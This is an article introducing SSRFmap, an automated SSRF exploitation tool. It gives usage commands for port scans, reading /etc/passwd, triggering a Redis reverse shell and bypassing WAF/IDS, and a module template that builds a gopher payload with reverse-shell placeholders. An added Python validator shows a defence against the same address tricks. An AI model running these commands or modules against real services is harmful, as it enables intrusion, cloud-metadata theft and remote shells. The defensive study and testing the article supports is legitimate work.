SSRFmap: a powerful automated SSRF fuzzing & exploitation tool
SSRF, Server-Side Request Forgery, is widely used by cybercriminals to attack or compromise web services. The tool introduced today, SSRFmap, finds and exploits SSRF vulnerabilities in a target web service.
SSRFmap takes a Burp request file as input, and researchers control the fuzzing process through its command-line options.
Project address
SSRFmap: https://github.com/swisskyrepo/SSRFmap
Installation
Clone the project from its GitHub repository to your local machine:
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--level [LEVEL] Level of test to perform (1-5, default: 1)
Usage
SSRFmap's default usage is as follows:
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
You can use data/example.py to check that the framework runs correctly:
FLASK_APP=data/example.py flask run & python ssrfmap.py -r data/request.txt -p url -m readfiles
Modules
SSRFmap integrates the following modules, which you select with the -m option:
Module name  | Description
fastcgi      | FastCGI RCE
redis        | Redis RCE
github       | GitHub Enterprise RCE < 2.8.7
zabbix       | Zabbix RCE
mysql        | MySQL command execution
docker       | Docker info leak (API)
smtp         | SMTP mail sending
portscan     | Port scan on the host
networkscan  | HTTP ping sweep
readfiles    | Read files, e.g. /etc/passwd
alibaba      | Read files from the provider (e.g. meta-data, user-data)
aws          | Read files from the provider (e.g. meta-data, user-data)
gce          | Read files from the provider (e.g. meta-data, user-data)
digitalocean | Read files from the provider (e.g. meta-data, user-data)
socksproxy   | SOCKS4 proxy
smbhash      | Crack SMB authentication via a UNC path
tomcat       | Brute-force Tomcat Manager
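The module list shows what one SSRF reaches (local files, cloud metadata, Redis over gopher://), and the --level payloads show why matching the literal string 127.0.0.1 is not a defence. The validator below is an added defensive example, not code from the original article or from SSRFmap, and its function names are my own: it canonicalizes the host of a user-supplied URL and refuses the schemes and address forms those modules rely on.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # gopher://, file://, dict:// are refused

def parse_literal_ip(host):
    """Return an ipaddress object if host is an IP literal, else None.
    Handles the forms --level payloads cycle through: 127.0.0.1, [::], 0,
    127.1, 0x7f.0.0.1, 2130706433, ::ffff:127.0.0.1."""
    host = host.strip("[]")
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:  # inet_aton accepts the legacy shorthand forms that ipaddress rejects
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None

def is_internal(ip):
    """True for any address a server-side fetch should never reach."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # unwrap ::ffff:a.b.c.d before classifying
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)

def default_resolver(host):
    """Resolve a hostname to every address it has (uses real DNS)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def check_outbound_url(url, resolver=default_resolver):
    """Decide whether a user-supplied URL may be fetched server-side.
    Returns (allowed, reason). Hostnames are resolved and every address is
    checked, so a name that points at an internal IP is refused as well."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host"
    ip = parse_literal_ip(host)
    targets = [ip] if ip else [ipaddress.ip_address(a) for a in resolver(host)]
    for target in targets:
        if is_internal(target):
            return False, "resolves to internal address %s" % target
    return True, "ok"
```

Checking at validation time still leaves a DNS rebinding window, so the fetching code should connect to the address that passed the check rather than resolving the name a second time.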
If you want to add your own module for a specific service, you can start from the template code below:
from core.utils import *
import logging

name          = "servicename in lowercase"
description   = "ServiceName RCE - What does it do"
author        = "Name or pseudo of the author"
documentation = ["http://link_to_a_research", "http://another_link"]

class exploit():
    SERVER_HOST = "127.0.0.1"
    SERVER_PORT = "4242"

    def __init__(self, requester, args):
        logging.info("Module '{}' launched!".format(name))

        # Handle args for reverse shell
        if args.lhost is None: self.SERVER_HOST = input("Server Host:")
        else:                  self.SERVER_HOST = args.lhost
        if args.lport is None: self.SERVER_PORT = input("Server Port:")
        else:                  self.SERVER_PORT = args.lport

        # Data for the service
        # Using a generator to create the host list
        # Edit the following ip if you need to target something else
        gen_host = gen_ip_list("127.0.0.1", args.level)
        for ip in gen_host:
            port = "6379"
            data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
            payload = wrapper_gopher(data, ip, port)

            # Handle args for reverse shell
            payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
            payload = payload.replace("SERVER_PORT", self.SERVER_PORT)

            # Send the payload
            r = requester.do_request(args.param, payload)
*Source: SSRFmap, compiled by FreeBuf editor Alpha_h4ck; please credit FreeBuf.COM when reposting